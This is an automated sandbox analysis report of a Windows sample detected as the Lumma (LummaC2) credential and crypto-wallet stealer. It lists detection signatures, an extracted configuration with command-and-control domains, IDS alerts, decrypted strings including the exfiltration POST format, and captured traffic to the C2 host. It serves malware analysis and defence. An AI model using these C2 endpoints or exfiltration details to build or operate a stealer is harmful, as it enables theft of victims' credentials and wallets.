Edit tour

Windows Analysis Report
ZX2M0AXZ56.exe

Overview

General Information

Sample name:	ZX2M0AXZ56.exe renamed because original name is a hash value
Original sample name:	e295c4c73781ae57171084aa84070765.exe
Analysis ID:	1580876
MD5:	e295c4c73781ae57171084aa84070765
SHA1:	2f5162e8aa22e6ef1433e2fa0f0ac044e545bac2
SHA256:	be152be208036072fc9687649502265a7bc33cea756e4173deb7ebafd9a0c363
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

ZX2M0AXZ56.exe (PID: 3804 cmdline: "C:\Users\user\Desktop\ZX2M0AXZ56.exe" MD5: E295C4C73781AE57171084AA84070765)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["appliacnesot.buzz", "mindhandru.buzz", "scentniej.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "inherineau.buzz", "prisonyfork.buzz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.2171437593.00000000009D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000003.1944581923.00000000009D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000003.2167082560.00000000009D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000003.2170689268.00000000009D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000003.1945137518.00000000009D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ZX2M0AXZ56.exe PID: 3804	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: ZX2M0AXZ56.exe PID: 3804	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ZX2M0AXZ56.exe PID: 3804	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:15.887818+0100	2028371	3	Unknown Traffic	192.168.2.7	49704	104.21.11.101	443	TCP
2024-12-26T12:45:18.079999+0100	2028371	3	Unknown Traffic	192.168.2.7	49705	104.21.11.101	443	TCP
2024-12-26T12:45:27.725920+0100	2028371	3	Unknown Traffic	192.168.2.7	49722	104.21.11.101	443	TCP
2024-12-26T12:46:15.698798+0100	2028371	3	Unknown Traffic	192.168.2.7	49827	104.21.11.101	443	TCP
2024-12-26T12:46:22.061858+0100	2028371	3	Unknown Traffic	192.168.2.7	49845	104.21.11.101	443	TCP
2024-12-26T12:46:44.248415+0100	2028371	3	Unknown Traffic	192.168.2.7	49887	104.21.11.101	443	TCP
2024-12-26T12:46:46.696849+0100	2028371	3	Unknown Traffic	192.168.2.7	49893	104.21.11.101	443	TCP
2024-12-26T12:46:48.068193+0100	2028371	3	Unknown Traffic	192.168.2.7	49899	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:16.760943+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49704	104.21.11.101	443	TCP
2024-12-26T12:45:26.037486+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49705	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:16.760943+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49704	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:45:26.037486+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49705	104.21.11.101	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T12:46:14.283683+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49722	104.21.11.101	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ZX2M0AXZ56.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://mindhandru.buzz/api.	Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: ZX2M0AXZ56.exe.3804.5.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["appliacnesot.buzz", "mindhandru.buzz", "scentniej.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "inherineau.buzz", "prisonyfork.buzz"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: ZX2M0AXZ56.exe	Virustotal: Detection: 56%			Perma Link
Source: ZX2M0AXZ56.exe	ReversingLabs: Detection: 64%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: ZX2M0AXZ56.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: hummskitnj.buzz
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: appliacnesot.buzz
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: screwamusresz.buzz
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: inherineau.buzz
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: scentniej.buzz
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: rebuildeso.buzz
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: prisonyfork.buzz
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: mindhandru.buzz
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: - Screen Resoluton:
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: Workgroup: -
Source: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp	String decryptor: LOGS11--LiveTraffic

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Code function: 5_2_004C57C0 CryptUnprotectData,

5_2_004C57C0

Source: ZX2M0AXZ56.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49899 version: TLS 1.2

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	5_2_004F0340
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov edx, ebx	5_2_004B8600
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov edi, dword ptr [esi+30h]	5_2_004BCC7A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]	5_2_004F0D20
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov byte ptr [ebx], al	5_2_004DD34A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov eax, ebx	5_2_004D7440
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]	5_2_004D7440
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	5_2_004F1720
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_004D1A10
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov byte ptr [ebx], al	5_2_004DE0DA
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov byte ptr [ebx], al	5_2_004DC0E6
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov byte ptr [ebx], al	5_2_004DC09E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov byte ptr [ebx], al	5_2_004DC09E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov eax, dword ptr [004F6130h]	5_2_004C8169
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_004D81CC
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	5_2_004E6210
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov ecx, eax	5_2_004CC300
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_004D83D8
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]	5_2_004DC465
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov byte ptr [ebx], al	5_2_004DC465
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_004D8528
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov edi, ecx	5_2_004DA5B6
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	5_2_004F06F0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_004DC850
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then push esi	5_2_004BC805
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_004D2830
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	5_2_004EC830
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then mov eax, ebx	5_2_004CC8A0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]	5_2_004CC8A0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]	5_2_004CC8A0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]	5_2_004CC8A0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	5_2_004D89E9
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	5_2_004EC990
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h	5_2_004ECA40
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 4x nop then lea esi, dword ptr [eax+00000270h]	5_2_004B8A50

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49722 -> 104.21.11.101:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: mindhandru.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz

Source: Joe Sandbox View

IP Address: 104.21.11.101 104.21.11.101

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49722 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49845 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49827 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49899 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49887 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49893 -> 104.21.11.101:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WSR4CMZL6AUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12808Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HWMX4PKTX58WQYOMZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15076Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=03PXA2FG4VMPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20371Host: mindhandru.buzz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: mindhandru.buzz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz

Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: ZX2M0AXZ56.exe, 00000005.00000003.2209623789.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2194882193.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1944581923.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2167082560.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404995967.0000000000986000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404897117.0000000000975000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1945137518.00000000009B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: ZX2M0AXZ56.exe, 00000005.00000002.2235693260.0000000005304000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2223846655.0000000005304000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404995967.0000000000986000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404897117.0000000000975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/
